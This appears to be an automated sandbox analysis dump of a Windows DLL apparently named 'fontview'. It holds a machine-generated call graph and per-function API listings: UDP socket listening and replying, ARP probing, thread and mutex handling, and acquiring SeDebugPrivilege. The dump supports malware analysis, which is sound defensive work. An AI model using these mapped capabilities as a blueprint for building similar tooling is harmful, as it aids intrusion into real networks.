32373->32430 32470 10014c17 Mailbox ___DllMainCRTStartup 32373->32470 32486 10014fb0 Mailbox 32373->32486 32374 10001d63 numpunct 69 API calls 32377 10014ffd 32374->32377 32381 10001d63 numpunct 69 API calls 32375->32381 32379 10014915 32376->32379 32380 100149ee 32376->32380 32382 10001f26 ___DllMainCRTStartup 69 API calls 32377->32382 32378 10001f26 ___DllMainCRTStartup 69 API calls 32383 10014dcd 32378->32383 32388 10001d63 numpunct 69 API calls 32379->32388 32379->32468 32386 10001d63 numpunct 69 API calls 32380->32386 32384 10014ae6 32381->32384 32385 1001501f 32382->32385 32387 10001d63 numpunct 69 API calls 32383->32387 32389 10001f26 ___DllMainCRTStartup 69 API calls 32384->32389 32390 1001c022 69 API calls 32385->32390 32391 100149fb 32386->32391 32392 10014ddf 32387->32392 32393 10014929 32388->32393 32394 10014b08 32389->32394 32395 1001502e Mailbox 32390->32395 32396 10001f26 ___DllMainCRTStartup 69 API calls 32391->32396 32397 10001d63 numpunct 69 API calls 32392->32397 32398 10001f26 ___DllMainCRTStartup 69 API calls 32393->32398 32399 1001c022 69 API calls 32394->32399 32406 10001d63 numpunct 69 API calls 32395->32406 32400 10014a1d 32396->32400 32401 10014df3 32397->32401 32403 1001494a 32398->32403 32404 10014b17 32399->32404 32405 1001c022 69 API calls 32400->32405 32402 10001d63 numpunct 69 API calls 32401->32402 32408 10014e07 32402->32408 32409 1001c022 69 API calls 32403->32409 32414 10002d15 ___DllMainCRTStartup 69 API calls 32404->32414 32404->32468 32410 10014a2c 32405->32410 32407 10015052 32406->32407 32411 10002d15 ___DllMainCRTStartup 69 API calls 32407->32411 32412 10001d63 numpunct 69 API calls 32408->32412 32413 10014959 32409->32413 32417 10002d15 ___DllMainCRTStartup 69 API calls 32410->32417 32410->32468 32415 10015064 32411->32415 32416 10014e1b 32412->32416 32422 10002d15 ___DllMainCRTStartup 69 API calls 32413->32422 32413->32468 32418 10014b35 32414->32418 32419 1001445f 105 API calls 32415->32419 32420 10001d63 numpunct 69 API calls 32416->32420 32421 10014a56 32417->32421 32423 10002d15 ___DllMainCRTStartup 69 API calls 32418->32423 32424 1001507a 32419->32424 32425 10014e2f 32420->32425 32426 10002d15 ___DllMainCRTStartup 69 API calls 32421->32426 32427 10014977 32422->32427 32428 10014b47 32423->32428 32424->32430 32435 10002d15 ___DllMainCRTStartup 69 API calls 32424->32435 32431 1001ba63 ___DllMainCRTStartup 69 API calls 32425->32431 32432 10014a68 32426->32432 32433 10002d15 ___DllMainCRTStartup 69 API calls 32427->32433 32429 1001445f 105 API calls 32428->32429 32434 10014b5e 32429->32434 32430->32366 32430->32468 32436 10014e48 32431->32436 32437 1001445f 105 API calls 32432->32437 32438 10014989 32433->32438 32439 10002d15 ___DllMainCRTStartup 69 API calls 32434->32439 32440 100150b3 32435->32440 32441 1001ba63 ___DllMainCRTStartup 69 API calls 32436->32441 32442 10014a7c 32437->32442 32443 1001445f 105 API calls 32438->32443 32445 10014bab 32439->32445 32446 1001320b 72 API calls 32440->32446 32447 10014e5e 32441->32447 32451 10002d15 ___DllMainCRTStartup 69 API calls 32442->32451 32442->32468 32444 1001499d 32443->32444 32452 10002d15 ___DllMainCRTStartup 69 API calls 32444->32452 32444->32468 32448 10014268 80 API calls 32445->32448 32449 100150bf 32446->32449 32450 1001c022 69 API calls 32447->32450 32453 10014bb7 32448->32453 32449->32430 32461 10001e92 ___DllMainCRTStartup 69 API calls 32449->32461 32454 10014e6a 32450->32454 32455 10014a94 32451->32455 32456 100149b5 32452->32456 32457 10014bbf 32453->32457 32469 10014c95 ___DllMainCRTStartup 32453->32469 32460 10001d63 numpunct 69 API calls 32454->32460 32454->32468 32458 10013372 80 API calls 32455->32458 32459 10013b81 80 API calls 32456->32459 32463 10002f31 ___DllMainCRTStartup 69 API calls 32457->32463 32457->32470 32458->32468 32459->32468 32462 10014ece 32460->32462 32461->32430 32464 10002d15 ___DllMainCRTStartup 69 API calls 32462->32464 32463->32470 32465 10014ee6 32464->32465 32466 10002d15 ___DllMainCRTStartup 69 API calls 32465->32466 32467 10014ef8 32466->32467 32472 1001445f 105 API calls 32467->32472 32468->32365 32469->32470 32471 10014d54 ___DllMainCRTStartup 32469->32471 32473 10001f26 ___DllMainCRTStartup 69 API calls 32469->32473 32470->32378 32471->32470 32474 10001f26 ___DllMainCRTStartup 69 API calls 32471->32474 32475 10014f0f 32472->32475 32473->32471 32474->32470 32476 10002d15 ___DllMainCRTStartup 69 API calls 32475->32476 32475->32486 32477 10014f31 32476->32477 32478 10012d83 85 API calls 32477->32478 32479 10014f38 32478->32479 32480 10001d63 numpunct 69 API calls 32479->32480 32479->32486 32481 10014f49 32480->32481 32482 10002d15 ___DllMainCRTStartup 69 API calls 32481->32482 32483 10014f5e 32482->32483 32484 1000dd2b ___DllMainCRTStartup 174 API calls 32483->32484 32485 10014f6b 32484->32485 32485->32486 32487 10014f6f ___DllMainCRTStartup 32485->32487 32486->32374 32488 10003256 ___DllMainCRTStartup 69 API calls 32487->32488 32489 10014f85 32488->32489 32490 10002d15 ___DllMainCRTStartup 69 API calls 32489->32490 32491 10014f93 32490->32491 32492 100117aa ___DllMainCRTStartup 257 API calls 32491->32492 32493 10014f9c Sleep 32492->32493 32493->32486 32501 1000571b Mailbox 32495->32501 32496 10005822 32497 1000580e Sleep 32497->32501 32498 10005731 WaitForSingleObject 32498->32501 32500 10002d15 69 API calls ___DllMainCRTStartup 32500->32501 32501->32496 32501->32497 32501->32498 32501->32500 32503 100057ee ReleaseMutex 32501->32503 32511 10005839 69 API calls 2 library calls 32501->32511 32512 1000800d 111 API calls 8 library calls 32501->32512 32503->32501 32505 100056a4 32504->32505 32506 100056e9 32505->32506 32507 100056ae WaitForSingleObject 32505->32507 32509 100056c8 ReleaseMutex 32505->32509 32510 100056d8 Sleep 32505->32510 32513 10006695 32505->32513 32507->32505 32509->32505 32510->32505 32511->32501 32512->32501 32515 1000669f __chsize_nolock __EH_prolog 32513->32515 32514 100073fc 32514->32505 32515->32514 32671 1000a435 68 API calls _memmove 32515->32671 32517 1000671a 32672 1000a435 68 API calls _memmove 32517->32672 32519 10006737 32520 10006776 htonl htonl htonl htonl 32519->32520 32673 10008c24 68 API calls _free 32519->32673 32523 100067b5 ___lc_wcstolc _memmove 32520->32523 32522 10006768 32522->32520 32674 10008c24 68 API calls _free 32523->32674 32525 100067d4 32675 10008c24 68 API calls _free 32525->32675 32527 100067df 32676 100065aa 69 API calls numpunct 32527->32676 32529 100067f0 32530 10006800 32529->32530 32531 1000711c 32529->32531 32532 10006809 32530->32532 32539 10007044 ___DllMainCRTStartup 32530->32539 32533 10001d63 numpunct 69 API calls 32531->32533 32655 1000682b Mailbox ___DllMainCRTStartup 32531->32655 32536 10006830 32532->32536 32537 10006819 32532->32537 32585 10006a3b Mailbox ___DllMainCRTStartup 32532->32585 32535 1000713a 32533->32535 32540 10001d63 numpunct 69 API calls 32535->32540 32545 10001d63 numpunct 69 API calls 32536->32545 32536->32655 32537->32655 32677 10007539 128 API calls ___DllMainCRTStartup 32537->32677 32538 100073e1 Mailbox 32712 10008c24 68 API calls _free 32538->32712 32546 100070cc ___DllMainCRTStartup 32539->32546 32551 10001e92 ___DllMainCRTStartup 69 API calls 32539->32551 32542 1000714a 32540->32542 32541 10001d63 numpunct 69 API calls 32544 10006ace 32541->32544 32547 10001d63 numpunct 69 API calls 32542->32547 32549 10001d63 numpunct 69 API calls 32544->32549 32550 1000684a 32545->32550 32561 10001f26 ___DllMainCRTStartup 69 API calls 32546->32561 32552 10007160 32547->32552 32554 10006ae4 32549->32554 32555 10001d63 numpunct 69 API calls 32550->32555 32551->32546 32703 1001c022 69 API calls 3 library calls 32552->32703 32553 100073f1 32713 10008c24 68 API calls _free 32553->32713 32685 1001c022 69 API calls 3 library calls 32554->32685 32559 10006860 32555->32559 32678 1001c022 69 API calls 3 library calls 32559->32678 32562 100070f4 32561->32562 32701 10005839 69 API calls 2 library calls 32562->32701 32564 10006af9 Mailbox 32564->32655 32686 100082c8 69 API calls ___DllMainCRTStartup 32564->32686 32565 10007105 32702 100065e5 71 API calls 4 library calls 32565->32702 32566 10007175 Mailbox 32569 10001d63 numpunct 69 API calls 32566->32569 32566->32655 32567 10006872 Mailbox 32567->32655 32679 100082c8 69 API calls ___DllMainCRTStartup 32567->32679 32570 1000719f 32569->32570 32572 10002d15 ___DllMainCRTStartup 69 API calls 32570->32572 32575 100071b4 32572->32575 32573 10006b33 32579 10002d15 ___DllMainCRTStartup 69 API calls 32573->32579 32573->32655 32704 1001445f 105 API calls 4 library calls 32575->32704 32577 100068b5 32581 10002d15 ___DllMainCRTStartup 69 API calls 32577->32581 32577->32585 32578 100071c9 32578->32655 32705 10007442 99 API calls 2 library calls 32578->32705 32580 10006b4f 32579->32580 32583 10002d15 ___DllMainCRTStartup 69 API calls 32580->32583 32584 100068d1 32581->32584 32587 10006b64 32583->32587 32588 10002d15 ___DllMainCRTStartup 69 API calls 32584->32588 32585->32541 32585->32655 32586 100071e9 ___DllMainCRTStartup 32594 10001d63 numpunct 69 API calls 32586->32594 32687 1001445f 105 API calls 4 library calls 32587->32687 32590 100068e3 32588->32590 32680 1001445f 105 API calls 4 library calls 32590->32680 32591 10006b80 32596 10002d15 ___DllMainCRTStartup 69 API calls 32591->32596 32591->32655 32593 100068fe 32593->32585 32598 10002d15 ___DllMainCRTStartup 69 API calls 32593->32598 32595 1000721a 32594->32595 32706 1000765f 106 API calls 4 library calls 32595->32706 32597 10006bcf 32596->32597 32688 10008570 72 API calls 3 library calls 32597->32688 32600 10006947 32598->32600 32681 1000841a 108 API calls 4 library calls 32600->32681 32601 10006bdb 32605 10001d63 numpunct 69 API calls 32601->32605 32601->32655 32604 1000723b 32606 10001e92 ___DllMainCRTStartup 69 API calls 32604->32606 32607 10006bef 32605->32607 32608 10007269 32606->32608 32609 10002d15 ___DllMainCRTStartup 69 API calls 32607->32609 32614 100072b7 32608->32614 32707 10008d1d 69 API calls __EH_prolog 32608->32707 32612 10006c0b 32609->32612 32610 10006953 ___DllMainCRTStartup 32610->32585 32682 10007a69 72 API calls 4 library calls 32610->32682 32689 10008365 69 API calls 3 library calls 32612->32689 32617 10002d15 ___DllMainCRTStartup 69 API calls 32614->32617 32616 10006997 32619 10001e92 ___DllMainCRTStartup 69 API calls 32616->32619 32620 100072c8 32617->32620 32618 10006c15 32621 10006ee1 32618->32621 32664 10006c1d Mailbox ___lc_wcstolc ___DllMainCRTStartup _memmove 32618->32664 32622 10006a01 32619->32622 32708 10007918 72 API calls 5 library calls 32620->32708 32624 10001d63 numpunct 69 API calls 32621->32624 32625 10001e92 ___DllMainCRTStartup 69 API calls 32622->32625 32627 10006eef 32624->32627 32628 10006a23 32625->32628 32626 100072d8 32629 10001e92 ___DllMainCRTStartup 69 API calls 32626->32629 32630 10001d63 numpunct 69 API calls 32627->32630 32683 10005839 69 API calls 2 library calls 32628->32683 32633 10007345 ___DllMainCRTStartup 32629->32633 32634 10006f02 32630->32634 32632 10006a34 32684 100065e5 71 API calls 4 library calls 32632->32684 32639 10001f26 ___DllMainCRTStartup 69 API calls 32633->32639 32696 10007701 72 API calls 5 library calls 32634->32696 32637 10006f15 32697 10002d96 69 API calls ___DllMainCRTStartup 32637->32697 32638 10001e92 ___DllMainCRTStartup 69 API calls 32638->32664 32640 10007360 32639->32640 32709 10005839 69 API calls 2 library calls 32640->32709 32643 10007371 32710 100065e5 71 API calls 4 library calls 32643->32710 32644 10006f82 32698 10002d96 69 API calls ___DllMainCRTStartup 32644->32698 32647 10006fa0 32699 10005839 69 API calls 2 library calls 32647->32699 32649 10006deb _memmove 32652 10001f26 ___DllMainCRTStartup 69 API calls 32649->32652 32649->32655 32650 10006fb1 32700 100065e5 71 API calls 4 library calls 32650->32700 32651 10001f26 ___DllMainCRTStartup 69 API calls 32651->32664 32654 10006e41 32652->32654 32657 10002d15 ___DllMainCRTStartup 69 API calls 32654->32657 32711 10008c24 68 API calls _free 32655->32711 32656 10002d15 ___DllMainCRTStartup 69 API calls 32656->32664 32658 10006e56 32657->32658 32660 10001d63 numpunct 69 API calls 32658->32660 32659 10001d63 numpunct 69 API calls 32659->32664 32661 10006e65 32660->32661 32693 10007701 72 API calls 5 library calls 32661->32693 32664->32638 32664->32649 32664->32651 32664->32655 32664->32656 32664->32659 32690 10007701 72 API calls 5 library calls 32664->32690 32691 10005839 69 API calls 2 library calls 32664->32691 32692 100065e5 71 API calls 4 library calls 32664->32692 32665 10006e78 Mailbox ___DllMainCRTStartup 32694 10005839 69 API calls 2 library calls 32665->32694 32669 10006ea0 32695 100065e5 71 API calls 4 library calls 32669->32695 32671->32517 32672->32519 32673->32522 32674->32525 32675->32527 32676->32529 32677->32655 32678->32567 32679->32577 32680->32593 32681->32610 32682->32616 32683->32632 32684->32585 32685->32564 32686->32573 32687->32591 32688->32601 32689->32618 32690->32664 32691->32664 32692->32664 32693->32665 32694->32669 32695->32655 32696->32637 32697->32644 32698->32647 32699->32650 32700->32655 32701->32565 32702->32655 32703->32566 32704->32578 32705->32586 32706->32604 32707->32614 32708->32626 32709->32643 32710->32655 32711->32538 32712->32553 32713->32514 32714 100058bf 32715 100058c9 __EH_prolog 32714->32715 32716 10009203 ___DllMainCRTStartup RaiseException 32715->32716 32717 10005996 32716->32717 32718 10033888 std::_Facet_Register 69 API calls 32717->32718 32719 100059c8 32718->32719 32726 100059f9 32719->32726 32731 1001eac0 32719->32731 32724 10005a11 32725 10033888 std::_Facet_Register 69 API calls 32724->32725 32727 10005a4c 32725->32727 32754 1000d5a3 32726->32754 32729 10033888 std::_Facet_Register 69 API calls 32727->32729 32730 10005a99 32727->32730 32782 1003245c RaiseException std::exception::exception __CxxThrowException@8 32727->32782 32729->32727 32783 10025e20 32731->32783 32733 1001eb0b 32734 1001eb45 32733->32734 32735 1001eb25 GetNativeSystemInfo 32733->32735 32736 1001eb4a HeapCreate 32734->32736 32735->32736 32788 1001f7b0 HeapCreate 32736->32788 32741 1001ec36 32743 10033888 std::_Facet_Register 69 API calls 32741->32743 32742 10033984 _free 68 API calls 32742->32741 32744 100059de 32743->32744 32745 1001e420 HeapCreate 32744->32745 32834 1001f4d0 HeapCreate 32745->32834 32749 1001e4aa 32750 1001e4e2 32749->32750 32752 10033984 _free 68 API calls 32749->32752 32751 10033888 std::_Facet_Register 69 API calls 32750->32751 32753 1001e52c 32751->32753 32752->32750 32753->32726 32755 1000d5ad __EH_prolog 32754->32755 32756 10009203 ___DllMainCRTStartup RaiseException 32755->32756 32757 1000d66d 32756->32757 32758 10033888 std::_Facet_Register 69 API calls 32757->32758 32759 1000d68c 32758->32759 32760 1000d696 32759->32760 32850 1003245c RaiseException std::exception::exception __CxxThrowException@8 32759->32850 32839 1000ce76 32760->32839 32764 10033888 std::_Facet_Register 69 API calls 32765 1000d702 32764->32765 32767 1000d70f ___lc_wcstolc 32765->32767 32847 1001fe00 32765->32847 32768 1001c213 ___DllMainCRTStartup 70 API calls 32767->32768 32769 1000d747 32768->32769 32770 10032fed _sprintf 104 API calls 32769->32770 32771 1000d769 32770->32771 32772 10003078 ___DllMainCRTStartup 69 API calls 32771->32772 32773 1000d78a 32772->32773 32774 10002f31 ___DllMainCRTStartup 69 API calls 32773->32774 32775 1000d79d Mailbox 32774->32775 32776 10001898 ___DllMainCRTStartup 104 API calls 32775->32776 32777 1000d7b5 32776->32777 32778 10001d63 numpunct 69 API calls 32777->32778 32779 1000d7be CreateMutexA 32778->32779 32780 10034410 __time64 GetSystemTimeAsFileTime 32779->32780 32781 1000d80e Mailbox ___DllMainCRTStartup 32780->32781 32781->32724 32784 10025ebe 32783->32784 32785 10025e4e GetNativeSystemInfo 32783->32785 32784->32733 32786 10025ea0 32785->32786 32787 10025e78 GetNativeSystemInfo 32785->32787 32786->32733 32787->32733 32789 1001f814 32788->32789 32790 1001ebe4 32788->32790 32791 10033984 _free 68 API calls 32789->32791 32792 1001f8e0 CreateSemaphoreA CreateSemaphoreA 32790->32792 32791->32790 32797 100203b0 32792->32797 32796 1001ebfe 32796->32741 32796->32742 32814 10020540 32797->32814 32801 1001f999 32802 10020260 32801->32802 32803 1002026c 32802->32803 32812 10020287 32802->32812 32833 100204d0 69 API calls 32803->32833 32805 10020277 32807 10033984 _free 68 API calls 32805->32807 32806 100339bc _malloc 68 API calls 32808 100202de 32806->32808 32809 1002027f 32807->32809 32810 100339bc _malloc 68 API calls 32808->32810 32811 10033984 _free 68 API calls 32809->32811 32813 100202eb ___lc_wcstolc 32810->32813 32811->32812 32812->32806 32812->32813 32813->32796 32815 10033888 std::_Facet_Register 69 API calls 32814->32815 32816 1002054a 32815->32816 32818 100203f1 32816->32818 32830 1003245c RaiseException std::exception::exception __CxxThrowException@8 32816->32830 32820 10020580 32818->32820 32821 100205aa 32820->32821 32829 10020611 32820->32829 32822 10020777 32821->32822 32825 100205d5 32821->32825 32821->32829 32831 1003248d 69 API calls 2 library calls 32822->32831 32824 10020604 32824->32829 32832 1003245c RaiseException std::exception::exception __CxxThrowException@8 32824->32832 32825->32824 32828 10033888 std::_Facet_Register 69 API calls 32825->32828 32825->32829 32828->32824 32829->32801 32833->32805 32835 1001f534 32834->32835 32837 1001e49a 32834->32837 32836 10033984 _free 68 API calls 32835->32836 32836->32837 32838 1001f600 71 API calls 32837->32838 32838->32749 32840 1000ce80 ___lc_wcstolc ___DllMainCRTStartup __EH_prolog 32839->32840 32841 10001f26 ___DllMainCRTStartup 69 API calls 32840->32841 32842 1000cf37 ___DllMainCRTStartup 32841->32842 32843 10001f26 ___DllMainCRTStartup 69 API calls 32842->32843 32844 1000cf4c ___DllMainCRTStartup 32843->32844 32845 10001f26 ___DllMainCRTStartup 69 API calls 32844->32845 32846 1000cf61 32845->32846 32846->32764 32851 1001f140 32847->32851 32849 1001fe42 32849->32767 32852 1001f1b2 GetNativeSystemInfo 32851->32852 32853 1001f1d6 32851->32853 32852->32853 32854 1001f4d0 69 API calls 32853->32854 32855 1001f266 InitializeCriticalSectionAndSpinCount CreateEventA CreateEventA 32854->32855 32855->32849

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 987 1001d6d7-1001d700 988 1001d903-1001d919 987->988 989 1001d706-1001d719 socket 987->989 990 1001d726-1001d7bf htons htonl htons setsockopt * 3 bind 989->990 991 1001d71b-1001d721 WSAGetLastError 989->991 990->991 992 1001d7c5-1001d83a call 10039700 call 10002d15 call 1000191f call 10003256 call 10002d15 call 1000191f call 10003256 990->992 991->988 1007 1001d8f1-1001d8fe call 10001d92 * 2 992->1007 1008 1001d840-1001d845 992->1008 1007->988 1010 1001d847-1001d873 call 10039700 recvfrom 1008->1010 1015 1001d875-1001d87b WSAGetLastError 1010->1015 1016 1001d87d-1001d895 inet_ntoa 1010->1016 1017 1001d8e8-1001d8eb 1015->1017 1018 1001d899-1001d89d 1016->1018 1017->1007 1017->1010 1019 1001d8b9-1001d8bb 1018->1019 1020 1001d89f-1001d8a1 1018->1020 1023 1001d8be-1001d8c0 1019->1023 1021 1001d8a3-1001d8a9 1020->1021 1022 1001d8b5-1001d8b7 1020->1022 1021->1019 1024 1001d8ab-1001d8b3 1021->1024 1022->1023 1023->1017 1025 1001d8c2-1001d8e2 sendto 1023->1025 1024->1018 1024->1022 1025->1017
                                                      APIs
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 1001D70D
                                                      • WSAGetLastError.WS2_32 ref: 1001D71B
                                                      • htons.WS2_32(?), ref: 1001D736
                                                      • htonl.WS2_32(00000000), ref: 1001D73F
                                                      • htons.WS2_32(?), ref: 1001D753
                                                      • setsockopt.WS2_32(?,0000FFFF,00000020,?), ref: 1001D77C
                                                      • setsockopt.WS2_32(?,0000FFFF,00001005,?,00000004), ref: 1001D796
                                                      • setsockopt.WS2_32(?,0000FFFF,00001006,?,00000004), ref: 1001D7A8
                                                      • bind.WS2_32(?,?,00000010), ref: 1001D7B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: setsockopt$htons$ErrorLastbindhtonlsocket
                                                      • String ID: req$res
                                                      • API String ID: 3993217638-3551752921
                                                      • Opcode ID: cedc8808c09bb2cc55dd2f956e691977e6684bca6089a6c735cfa8a9fca93f80
                                                      • Instruction ID: 1bc47685fa1208dc3a93f9195926757f6b3397a19b8973d8ec54e6f16cbb67a6
                                                      • Opcode Fuzzy Hash: cedc8808c09bb2cc55dd2f956e691977e6684bca6089a6c735cfa8a9fca93f80
                                                      • Instruction Fuzzy Hash: 9961A0B1408745AFE300EF64CC81AABBBECFF85354F40491AF69586190D771ED58CB92
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000614B
                                                      • CreateThread.KERNEL32(00000000,00000000,1001D91A,?,00000000,00000000), ref: 100062EE
                                                        • Part of subcall function 1001E124: TerminateThread.KERNEL32(?,00000000), ref: 1001E13D
                                                        • Part of subcall function 1001E124: CloseHandle.KERNEL32(?), ref: 1001E146
                                                        • Part of subcall function 1001E124: CreateThread.KERNELBASE(00000000,00000000,1001D388,?,00000000,00000000), ref: 1001E159
                                                        • Part of subcall function 1001DF0D: gethostname.WS2_32(?,00000100), ref: 1001DF22
                                                      • __time64.LIBCMT ref: 100061B8
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                        • Part of subcall function 10008C40: __EH_prolog.LIBCMT ref: 10008C45
                                                        • Part of subcall function 1001E0D0: TerminateThread.KERNEL32(?,00000000), ref: 1001E0F5
                                                        • Part of subcall function 1001E0D0: CloseHandle.KERNEL32(?), ref: 1001E0FE
                                                        • Part of subcall function 1001E0D0: CreateThread.KERNELBASE(00000000,00000000,Function_0001D145,?,00000000,00000000), ref: 1001E111
                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,00000000), ref: 100061DE
                                                      • __time64.LIBCMT ref: 100061F4
                                                      • Sleep.KERNELBASE(1005AFD4), ref: 10006224
                                                      • __time64.LIBCMT ref: 1000622B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$Create__time64$CloseH_prologHandleSleepTerminateTime$FileSystem__aulldivgethostname
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 1676007256-3771769585
                                                      • Opcode ID: 3cb74091c6fcd31c574afb467b97beec77a2ce808bb828e89382d77d929e7311
                                                      • Instruction ID: edc6faf32b4ddbc48c22d14bf9bbfd6284b9bbf4270abf8aa5e2a7a96d60cd1e
                                                      • Opcode Fuzzy Hash: 3cb74091c6fcd31c574afb467b97beec77a2ce808bb828e89382d77d929e7311
                                                      • Instruction Fuzzy Hash: 7651C2759006419FEB14DF74C888ADE77E6FF08384F248479E95ADB14BDB34A984CB60
                                                      APIs
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 1001DFE9
                                                      • WSAGetLastError.WS2_32 ref: 1001DFF7
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastsocket
                                                      • String ID:
                                                      • API String ID: 1120909799-0
                                                      • Opcode ID: 77141d96e2b12b2691b9b20e9abebc24394108544499b08578934dcb4d0342ba
                                                      • Instruction ID: 715bde583ba2571ee879b219f8558a55a2540612a220d1531e37932013ff7162
                                                      • Opcode Fuzzy Hash: 77141d96e2b12b2691b9b20e9abebc24394108544499b08578934dcb4d0342ba
                                                      • Instruction Fuzzy Hash: 0D21B730640759BFE7219B648C8AFAEBBB8EF48B10F104225F715AA1E0D7F09985DB51
                                                      APIs
                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000001), ref: 10002209
                                                      • GlobalAlloc.KERNEL32(00000040,00000001,?,?,00000001,10011CC0,?,?,00000000,00000001), ref: 10002221
                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000001), ref: 10002236
                                                      • inet_addr.WS2_32(000001B0), ref: 1000225D
                                                      • inet_addr.WS2_32(000001D8), ref: 1000228F
                                                      • SendARP.IPHLPAPI(00000000,00000000,00000000,?), ref: 100022A5
                                                      • GlobalFree.KERNEL32(00000000), ref: 100022B7
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AdaptersGlobalInfoinet_addr$AllocFreeSend
                                                      • String ID:
                                                      • API String ID: 3182797412-0
                                                      • Opcode ID: 3bc0c3656b43d898c1dcc0318dd50a3af21fe7f04e09f680aee56353fb724470
                                                      • Instruction ID: 66c9d7adb0e976905d06d262638f06281183517b136eb4124925cbb498e8f50e
                                                      • Opcode Fuzzy Hash: 3bc0c3656b43d898c1dcc0318dd50a3af21fe7f04e09f680aee56353fb724470
                                                      • Instruction Fuzzy Hash: 38214175900616BBEB01DBF4CC48AAEBBF8FF05394F114156E905D3254E730DA41CBA0
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(000F01FF,?,?,?,?,?,1001A9E0), ref: 1001C2B5
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,1001A9E0), ref: 1001C2BC
                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 1001C2D2
                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 1001C302
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,1001A9E0), ref: 1001C30F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
